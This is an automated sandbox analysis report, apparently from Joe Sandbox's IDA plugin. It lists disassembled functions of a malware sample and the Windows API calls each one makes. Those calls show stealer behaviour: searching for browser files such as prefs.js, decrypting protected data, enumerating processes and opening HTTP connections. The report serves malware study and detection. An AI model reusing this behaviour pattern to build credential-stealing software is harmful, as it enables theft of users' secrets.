Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: AddressCurrentProcProcess$AllocateLibraryLoadMemorySectionUnmapViewVirtual
String ID: '%83$@WJL$b
API String ID: 2012120135-2451307631
Opcode ID: 6c822addb6a8880579f099a76e94f581a113f1e4082873c389c923cea85fb6d8
Instruction ID: 7d9955e5235ef44e8904a57b5ea436ba6d5673c94a8077c6df66e046ae60776a
Opcode Fuzzy Hash: 6c822addb6a8880579f099a76e94f581a113f1e4082873c389c923cea85fb6d8
Instruction Fuzzy Hash: 5F819F35E05249AFDB05CFA8D884BEEFBF5BF59300F248199E954A7341DB30A905CBA4

Function 017EEDE0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,017FEE08,017FE76A), ref: 017EEE4B
StrCmpCA.SHLWAPI(?,017FEE0C), ref: 017EEE93
StrCmpCA.SHLWAPI(?,017FEE10), ref: 017EEEA9
FindNextFileA.KERNELBASE(000000FF,?), ref: 017EF1C0
FindClose.KERNEL32(000000FF), ref: 017EF1D2

Strings

prefs.js, xrefs: 017EEF33

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 47ff473ae087adec2e8469e0771f669a603b1d6cb2fa56e03193d6b9d80afcf4
Instruction ID: ac667f8996ee69c68fa730e52b8fb21a531a078f7dd9c8901e1f5b0390863683
Opcode Fuzzy Hash: 47ff473ae087adec2e8469e0771f669a603b1d6cb2fa56e03193d6b9d80afcf4
Instruction Fuzzy Hash: E6B101719001199BCF24EF64DC99AEFF7B9AF64300F1045ACD50A97259EF30AA49CF92

Function 017E1600 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,01802758,?,017E1E43,?,0180275C,?,?,00000000,?,00000000), ref: 017E1853
StrCmpCA.SHLWAPI(?,01802760), ref: 017E18A3
StrCmpCA.SHLWAPI(?,01802764), ref: 017E18B9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017E1C70
DeleteFileA.KERNEL32(00000000), ref: 017E1CF4
FindNextFileA.KERNEL32(000000FF,?), ref: 017E1D4A
FindClose.KERNEL32(000000FF), ref: 017E1D5C

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Strings

\*.*, xrefs: 017E1721

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 0a06f0a02a5e4307b99d04aa3cfba60360118b9d394586cba25943eca155971a
Instruction ID: 62b255b0e720660b7780db37293160342dd42816485bffba214b93ffb706b38b
Opcode Fuzzy Hash: 0a06f0a02a5e4307b99d04aa3cfba60360118b9d394586cba25943eca155971a
Instruction Fuzzy Hash: 6812BE7191011A9BCF55EB60CC9DAEFF379AF64300F4041ED920A62695EF746B88CF62

Function 017ED1F0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,017FED00,017FE73E), ref: 017ED25B
StrCmpCA.SHLWAPI(?,017FED04), ref: 017ED2A3
StrCmpCA.SHLWAPI(?,017FED08), ref: 017ED2B9
FindNextFileA.KERNELBASE(000000FF,?), ref: 017ED51E
FindClose.KERNEL32(000000FF), ref: 017ED530

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 4510f505b2bfc791ff59b3b670574a46a7297c9f7d1fed7b458cc6f27158bc74
Instruction ID: 7834723e004815305129760619b0dd8d3ab756e1e7aa78b2b8dc9795feca2b94
Opcode Fuzzy Hash: 4510f505b2bfc791ff59b3b670574a46a7297c9f7d1fed7b458cc6f27158bc74
Instruction Fuzzy Hash: 2391237690010597CF14FFB4DC5D9EEF3BDAFA8300F10456CEA0696648EE349B588BA2

Function 00B32B10 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 303COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00000002,0000000A), ref: 00B32C5F
LoadResource.KERNEL32(00000000,00000000), ref: 00B32C6A
SizeofResource.KERNEL32(00000000,00000000), ref: 00B32C79
memset.MSVCRT ref: 00B32CC2

Part of subcall function 00B36160: memset.MSVCRT ref: 00B36200
Part of subcall function 00B36160: memmove.MSVCRT ref: 00B3620F

memcpy.MSVCRT ref: 00B32CE0

Strings

KF_O, xrefs: 00B32B62
2//2, xrefs: 00B32BEF

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: Resource$memset$FindLoadSizeofmemcpymemmove
String ID: 2//2$KF_O
API String ID: 2772311974-1641863619
Opcode ID: 5cd3372e1a46f368c2f59439c3ca8eadd28a186d35a4f705e75a0fdade0baec6
Instruction ID: 01db24444c26a12b1e2346953684f49427c289ea8b64d863b0f8a7a9b6e3af5b
Opcode Fuzzy Hash: 5cd3372e1a46f368c2f59439c3ca8eadd28a186d35a4f705e75a0fdade0baec6
Instruction Fuzzy Hash: 2DD19D74C042989BDB15CFA8C8517EEBBF0BF19304F6442D9E489B7242EB705A89CF65

Function 017F5A60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

GetKeyboardLayoutList.USER32(00000000,00000000,017FE12A), ref: 017F5AB1
LocalAlloc.KERNEL32(00000040,?), ref: 017F5AC9
GetKeyboardLayoutList.USER32(?,00000000), ref: 017F5ADD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 017F5B32
LocalFree.KERNEL32(00000000), ref: 017F5BF2

Strings

/ , xrefs: 017F5B4F

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 456ce46a50c769c3b222b174d6c4bc746820d367bb56f923f99bc251ea2cbd6b
Instruction ID: f22f7d432ac6e6e93d80a605afeeb3530f81c84827264331d4ace4e9f0e40717
Opcode Fuzzy Hash: 456ce46a50c769c3b222b174d6c4bc746820d367bb56f923f99bc251ea2cbd6b
Instruction Fuzzy Hash: 4F4116B1940219ABDB24DF94DC98BEEF778EB58700F1041DDE20AA6284DB742B85CF61

Function 017EDB90 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,017FE74A), ref: 017EDC02
StrCmpCA.SHLWAPI(?,017FED48), ref: 017EDC52
StrCmpCA.SHLWAPI(?,017FED4C), ref: 017EDC68
FindNextFileA.KERNEL32(000000FF,?), ref: 017EE336

Strings

\*.*, xrefs: 017EDBAD

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: bc4c2c873da1ae6f9bb2a7bf93e980f1de054309416b1214d807257976c6dcc1
Instruction ID: 3b8f2bed6234cae8e368fb41f57ee11c4299d58f034984e19d6a93e1aed992f5
Opcode Fuzzy Hash: bc4c2c873da1ae6f9bb2a7bf93e980f1de054309416b1214d807257976c6dcc1
Instruction Fuzzy Hash: 32120F7191011A9ACF14FB60DC9DAEFF379AF64300F4041AD960A66698EF746B48CF63

Function 017F6550 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 017F659A
Process32First.KERNEL32(?,00000128), ref: 017F65AE
Process32Next.KERNEL32(?,00000128), ref: 017F65C3

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindCloseChangeNotification.KERNEL32(?), ref: 017F6631

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: c333d14e16be77117db396ea2580b35b7db07323b80ce54e2e3f109d828f894a
Instruction ID: a9110611653f81698acf9bc5afb76fc95766adf88acfb8cf3dc1d4a92aaf2a32
Opcode Fuzzy Hash: c333d14e16be77117db396ea2580b35b7db07323b80ce54e2e3f109d828f894a
Instruction Fuzzy Hash: 54314DB1901119ABCF24DF55DC58FEFF778EF55700F10419DA20AA22A4EB346A44CFA2

Function 017F5900 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000), ref: 017F5933
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000,?), ref: 017F593A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000,?), ref: 017F594D
wsprintfA.USER32 ref: 017F5987

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 371a138631c359d083f8613c1fbc49af7219556810c3def32c36b113f5a8131c
Instruction ID: a35baae6d47ece824a0df736e4ebf62db0b14de60bbb634e3dcf90a97b05370d
Opcode Fuzzy Hash: 371a138631c359d083f8613c1fbc49af7219556810c3def32c36b113f5a8131c
Instruction Fuzzy Hash: E511A1B1945218EBEB20CF58DC45FAABB78FB04725F0043D9F61A93384C7741A458F51

Function 017E9560 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 017E9584
LocalAlloc.KERNEL32(00000040,00000000), ref: 017E95A3
LocalFree.KERNEL32(?), ref: 017E95CF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: ea2d2f5222695288c499056f26c73d97f7c010a4b2942ff65a1145b06e80b9ec
Instruction ID: 95201d6bcecdc59d49d6f51d405f71c0192fbd5b8d0218d058c9d74452d3874a
Opcode Fuzzy Hash: ea2d2f5222695288c499056f26c73d97f7c010a4b2942ff65a1145b06e80b9ec
Instruction Fuzzy Hash: A411B7B8A00209EFCB05DF98C988AAEB7B5FF88300F204558E915A7394D734AA51CF61

Function 017F5720 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017E1177), ref: 017F5750
HeapAlloc.KERNEL32(00000000,?,?,?,017E1177), ref: 017F5757
GetUserNameA.ADVAPI32(00000104,00000104), ref: 017F576F

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: a227132ee48d479e0945671328ddcab4fd7c10b1abe50a52b08b25d5487c1613
Instruction ID: 65802b5bf3d274a879ef05f54cf8bf63e16aa05c41281a442d36a96705e7a6b6
Opcode Fuzzy Hash: a227132ee48d479e0945671328ddcab4fd7c10b1abe50a52b08b25d5487c1613
Instruction Fuzzy Hash: E2F04FB5D44209EFCB10DF99D845BAEFBB8FB08721F100219F605A3680C77555058BA1

Function 017E1120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,017F4947,017FE4C7), ref: 017E112A
ExitProcess.KERNEL32 ref: 017E113E

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: d0df1dacbf9e217a04f116c6971be50ac65e96dfc79b6fa02e13dffa806bf590
Instruction ID: 8b77c83a8bef18ff5a08f1f7cee9de88bb2d808fd58370611a6203209ca98be0
Opcode Fuzzy Hash: d0df1dacbf9e217a04f116c6971be50ac65e96dfc79b6fa02e13dffa806bf590
Instruction Fuzzy Hash: E7D05E78D0120CCBCB14DFE0D94E5DDFBB9AB0C711F000459DC0572241E6309842CB65

Function 017F76E0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013B3BC8), ref: 017F7721
GetProcAddress.KERNEL32(75900000,013B3BE0), ref: 017F773A
GetProcAddress.KERNEL32(75900000,013B3C58), ref: 017F7752
GetProcAddress.KERNEL32(75900000,013B3DD8), ref: 017F776A
GetProcAddress.KERNEL32(75900000,013B3BF8), ref: 017F7783
GetProcAddress.KERNEL32(75900000,013B4FC8), ref: 017F779B
GetProcAddress.KERNEL32(75900000,013AB5E0), ref: 017F77B3
GetProcAddress.KERNEL32(75900000,013AB720), ref: 017F77CC
GetProcAddress.KERNEL32(75900000,013B3C10), ref: 017F77E4
GetProcAddress.KERNEL32(75900000,013B3C70), ref: 017F77FC
GetProcAddress.KERNEL32(75900000,013B3C88), ref: 017F7815
GetProcAddress.KERNEL32(75900000,013B3CA0), ref: 017F782D
GetProcAddress.KERNEL32(75900000,013AB6A0), ref: 017F7845
GetProcAddress.KERNEL32(75900000,013B3CB8), ref: 017F785E
GetProcAddress.KERNEL32(75900000,013B3D00), ref: 017F7876
GetProcAddress.KERNEL32(75900000,013AB740), ref: 017F788E
GetProcAddress.KERNEL32(75900000,013B3CD0), ref: 017F78A7
GetProcAddress.KERNEL32(75900000,013B3D18), ref: 017F78BF
GetProcAddress.KERNEL32(75900000,013AB6C0), ref: 017F78D7
GetProcAddress.KERNEL32(75900000,013B3D30), ref: 017F78F0
GetProcAddress.KERNEL32(75900000,013AB6E0), ref: 017F7908
LoadLibraryA.KERNEL32(013B3D48,?,017F4930), ref: 017F791A
LoadLibraryA.KERNEL32(013B3EF8,?,017F4930), ref: 017F792B
LoadLibraryA.KERNEL32(013B3EC8,?,017F4930), ref: 017F793D
LoadLibraryA.KERNEL32(013B3E98,?,017F4930), ref: 017F794F
LoadLibraryA.KERNEL32(013B3F10,?,017F4930), ref: 017F7960
GetProcAddress.KERNEL32(75070000,013B3EB0), ref: 017F7982
GetProcAddress.KERNEL32(75FD0000,013B3EE0), ref: 017F79A3
GetProcAddress.KERNEL32(75FD0000,013B3E80), ref: 017F79BB
GetProcAddress.KERNEL32(75A50000,013B3F40), ref: 017F79DD
GetProcAddress.KERNEL32(74E50000,013AB700), ref: 017F79FE
GetProcAddress.KERNEL32(76E80000,013B4FD8), ref: 017F7A1F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 017F7A36

Strings

NtQueryInformationProcess, xrefs: 017F7A2A

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: efa11a2ce160478fa278ed72373d449740d5719bf4f12f00307773919c17e443
Instruction ID: ee948834ca22e22cc923fab0d8196f482496e8e07d6a10478f59589398cb9f55
Opcode Fuzzy Hash: efa11a2ce160478fa278ed72373d449740d5719bf4f12f00307773919c17e443
Instruction Fuzzy Hash: FAA15EBDD50600AFC366DFA8F98CA563BB9BB4C365710861DA609C324CD7799893CF21

Function 017E4DE0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 017E4516
Part of subcall function 017E4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 017E4526

lstrlen.KERNEL32(00000000), ref: 017E4E6A

Part of subcall function 017F6DB0: CryptBinaryToStringA.CRYPT32(00000000,017E4E5E,40000001,00000000,00000000), ref: 017F6DD0

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 017E5014
HttpOpenRequestA.WININET(00000000,013BE648,?,013C2018,00000000,00000000,00400100,00000000), ref: 017E5078

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

